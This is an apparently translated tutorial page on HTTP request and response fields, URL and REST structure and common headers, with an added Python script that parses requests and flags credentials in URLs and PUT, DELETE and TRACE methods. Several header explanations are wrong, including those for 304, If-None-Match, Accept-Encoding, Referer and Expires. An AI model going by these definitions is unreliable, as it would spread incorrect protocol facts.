<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">/auth/488/YourDetails.ashx?uid=129</strong> --> The page requested from the server</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HTTP/1.1</strong> --> The HTTP protocol version used</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Accept: </strong>The object types that can be accepted</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Referer: </strong>The URL of the page from which the request is made</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Accept-Language: </strong>The language information for the site</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">User-Agent:</strong> The value that identifies the browser</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Host: </strong>The host information</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">——————————-</span></div>
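The request anatomy above, together with the notes on GET, PUT, DELETE and TRACE in the HTTP methods section, as an added example that is not part of the original post: a parser that splits a raw request into the fields just described and flags credential-like parameters in the URL and methods that need access control. The two extra requests, the parameter-name list and the finding texts are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qsl

# Request from the post (Accept and User-Agent shortened for space).
PAGE_REQUEST = (
    "GET /auth/488/YourDetails.ashx?uid=129 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Referer: https://mdsec.net/auth/488/Home.ashx\r\n"
    "Accept-Language: en-GB\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Host: mdsec.net\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: SessionId=5B70C71F3FD4968935CDB6682E545476\r\n"
    "\r\n"
)
# Constructed samples: a login sent with GET, and an upload sent with PUT.
LOGIN_VIA_GET = (
    "GET /login?username=alice&password=example-only HTTP/1.1\r\n"
    "Host: test.dvwa.com\r\n"
    "\r\n"
)
UPLOAD_VIA_PUT = (
    "PUT /files/notes.txt HTTP/1.1\r\n"
    "Host: test.dvwa.com\r\n"
    "Content-Length: 5\r\n"
    "\r\n"
    "hello"
)

# Assumed name list; extend it to match the application under review.
SENSITIVE_PARAMS = {"password", "passwd", "pwd", "username", "user", "token"}
KNOWN_METHODS = {"GET", "POST", "HEAD", "TRACE", "OPTIONS", "PUT", "DELETE"}
RESTRICTED_METHODS = {"PUT", "DELETE", "TRACE"}


def parse_request(raw):
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError("malformed request line: %r" % lines[0])
    method, target, version = parts
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        # Reject missing colons and whitespace around the header name.
        if not sep or not name or name != name.strip():
            raise ValueError("malformed header line: %r" % line)
        headers.setdefault(name.lower(), []).append(value.strip())
    url = urlsplit(target)
    return {
        "method": method,
        "path": url.path,
        "query": parse_qsl(url.query, keep_blank_values=True),
        "version": version,
        "headers": headers,
        "body": body,
    }


def audit_request(req):
    """Return a list of findings for one parsed request."""
    findings = []
    if req["method"] not in KNOWN_METHODS:
        findings.append("unknown method %s" % req["method"])
    if req["method"] in RESTRICTED_METHODS:
        findings.append("%s should be disabled or access-controlled"
                        % req["method"])
    for name, _value in req["query"]:
        if name.lower() in SENSITIVE_PARAMS:
            findings.append("'%s' travels in the URL and will be logged"
                            % name)
    if req["version"] == "HTTP/1.1" and "host" not in req["headers"]:
        findings.append("HTTP/1.1 request without a Host header")
    return findings


if __name__ == "__main__":
    for raw in (PAGE_REQUEST, LOGIN_VIA_GET, UPLOAD_VIA_PUT):
        parsed = parse_request(raw)
        print(parsed["method"], parsed["path"], audit_request(parsed))
```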
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">
Meaning of the HTTP Response Fields</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HTTP/1.1</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> 200 OK </strong> –> Shows that the HTTP protocol is in use and its version, followed by the numeric code and the text phrase of the server's reply, which indicate whether the request succeeded.</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Date</strong>: <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Tue, 19 Apr 2011 09:23:32 GMT</strong> –> The server's date and time</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Server</strong>:<strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> Microsoft-IIS/6.0 –></strong> Server information</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">X-Powered-By: ASP.NET</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">–></strong> Shows which language the site is written in.</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Set-Cookie</strong>: tracking=tI8rk7joMx44S2Uu85nSWc –> Cookie for the connection established between the client and the server. It is used for the next request made to the site.</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">X-AspNet-Version: 2.0.50727</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">–></strong> Version of the language the site is written in</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cache-Control: no-cache</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">–></strong> Controls whether caching takes place.</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Pragma</strong>: no-cache</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Expires: Thu, 01 Jan 1970 00:00:00 GMT –></strong> Information on the renewal period of cookies.</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Content-Type: text/html; charset=utf-8</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">–></strong> File type and language format of the HTML page displayed in the browser.</span><br />
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Content-Length: 1067</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">–></strong> Size in bytes of the body of the returned response.</span><br />
<span style="background-color: #eeeeee;"><!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://</span><br />
<span style="background-color: #eeeeee;">www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”><html xmlns=”http://</span><br />
<span style="background-color: #eeeeee;">www.w3.org/1999/xhtml” ><head><title>Your details</title></span><br />
<span style="background-color: #eeeeee;">…</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">—————————————————————————-</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: #eeeeee; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">URL Information</strong></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">protocol</strong></span>://<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">hostname</strong></span>[:<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">port</strong></span>]/[<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">path</strong></span>/]file[?<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">param</strong></span>=<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">value</strong></span>]</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">protocol:</strong> The protocol in use: http, https, ftp, etc.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">hostname:</strong> The root directory of the site to be visited</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">port:</strong> The port the site uses. Port 80 is generally used, but ftp uses 21 and https uses 443.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">path:</strong> Path of the directories the site contains.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">param:</strong> Name of the variable that corresponds to a value of the page we request on the site.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">value:</strong> The value of the variable.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #993366; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Example</span>:</strong> <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #99cc00; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">https://www.fbh.com.tr/eğitim</span><span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">/web_egitimi.php</span><span style="border: 0px; box-sizing: border-box; color: #333399; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">?sid=12</span></strong></span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">————————————————————————-</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: #eeeeee; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">REST Information</strong></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">In this kind of URL, the parameter information for the requested page is not visible.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">Normal URL request: <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #99cc00; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">https://www.fbh.com.tr/eğitim</span><span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">/web_egitimi.php</span><span style="border: 0px; box-sizing: border-box; color: #333399; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">?sid=12&step=egitim</span></strong></span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">REST URL value: <strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #99cc00; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">https://www.fbh.com.tr/eğitim</span><span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">/web_egitimi.php/</span><span style="border: 0px; box-sizing: border-box; color: #333399; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">12/egitim</span></strong></span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">————————————————————————-</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">
HTTP HEADERS</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">The meanings of the headers used in HTTP request-response exchanges are as follows.</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">General Headers</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Connection:</strong> Indicates whether the TCP connection between the client and the server continues after the HTTP transfer has completed.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Content-Encoding: </strong>Holds information on the methods (such as gzip) used to make data transfer faster.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Content-Length: (</strong>except for HEAD) Shows the length of the body of requests made with methods such as GET and POST.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Content-Type: </strong>Shows the type of the message body (text/html, text/javascript).</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Transfer-Encoding:</strong> Allows certain transformations to be applied to the message body of the response so that it is transferred faster.</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">REQUEST Headers</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Accept:</strong> Shows the types the client can accept, such as image formats and file formats.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Accept-Encoding:</strong> Shows the formats the server can accept.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Authorization: </strong>Shows the HTTP authentication types.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cookie:</strong> The client sends previously used cookies to the server.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Host: </strong>Shows the hostname to which the requested page belongs.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">If-Modified-Since:</strong> The time at which the browser last requested the page. If the requested page is not on the server, a response with code 304 is returned. Search engines also use it to show the version of the page they last cached.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">If-None-Match: </strong>Used to determine the server type.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Origin:</strong> Used in AJAX requests to identify the origin of the domain.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Referer:</strong> Shows the URL of the current request.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">User-Agent: </strong>Shows browser information.</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">RESPONSE Headers</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: black; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Access-Control-Allow-Origin: </span></strong><span style="border: 0px; box-sizing: border-box; color: black; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Used for origin checking in AJAX requests.</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cache-Control:</strong> Controls whether the browser caches the response.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">ETag: </strong> Shows special tags. It is also used to show the type of the server.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Expires: </strong>Shows how much longer the returned response may be displayed.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Location: </strong>Used when redirect pages are present. It appears in server responses whose code starts with 3.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Pragma: </strong>Shows the state of the caching directives (no-cache).</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Server: </strong>Shows information about the software language of the web server running on the host.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Set-Cookie: </strong>Holds the cookie shared between the client and the server. It is used for the next interaction.</span></div>
